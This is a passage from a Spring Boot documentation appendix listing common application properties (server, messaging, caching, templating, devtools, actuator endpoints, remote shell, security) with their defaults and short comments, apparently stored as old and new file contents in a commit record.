...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # hornetQ host (native mode)\n\tspring.artemis.port=5445 # hornetQ port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.listener.acknowledge-mode= # session acknowledgment mode\n\tspring.jms.listener.auto-startup=true # start the container automatically on startup\n\tspring.jms.listener.concurrency= # minimum number of concurrent consumers\n\tspring.jms.listener.max-concurrency= # maximum number of concurrent consumers\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, default to false.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n # DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n spring.devtools.restart.enabled=true # enable automatic restart\n spring.devtools.restart.exclude= # patterns that should be excluding for triggering a full restart\n spring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n spring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n spring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n spring.devtools.livereload.port=35729 # server port.\n\n # REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n spring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n spring.devtools.remote.debug.enabled=true # enable remote debug support\n spring.devtools.remote.debug.local-port=8000 # local remote debug server port\n spring.devtools.remote.restart.enabled=true # enable remote restart\n spring.devtools.remote.secret= # a shared secret required to establish a connection\n spring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creating policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# HYPERMEDIA ENDPOINTS\n\tendpoints.docs.enabled=true\n\tendpoints.docs.curies.enabled=false\n\tendpoints.hal.enabled=true\n\tendpoints.links.enabled=true\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are support. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. * allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude. Applied after the includes\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n # BANNER\n banner.charset=UTF-8 # banner file encoding\n banner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\tlogging.pattern.console= # appender pattern for output to the console (only supported with the default logback setup)\n\tlogging.pattern.file= # appender pattern for output to the file (only supported with the default logback setup)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.excluded-user-agents= # list of user-agents to exclude from compression\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.persistent=false # true if session should be saved across restarts\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\" ,\"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n server.undertow.buffers-per-region= # number of buffer per region\n server.undertow.direct-buffers=false # allocate buffers outside the Java heap\n server.undertow.io-threads= # number of I\/O threads to create for the worker\n server.undertow.worker-threads= # number of worker threads\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the content of the \"default\" model should be ignored redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least a strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g. CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.locale= # locale used for formatting\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\tspring.jackson.time-zone # Time zone used when formatting dates. Configured using any recognized time zone identifier, for example \"America\/Los_Angeles\" or \"GMT+10\"\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\tspring.thymeleaf.template-resolver-order= # order of the template resolver in the chain\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n spring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example \"\/WEB-INF\/toolbox.xml\"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=UTF-8\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned 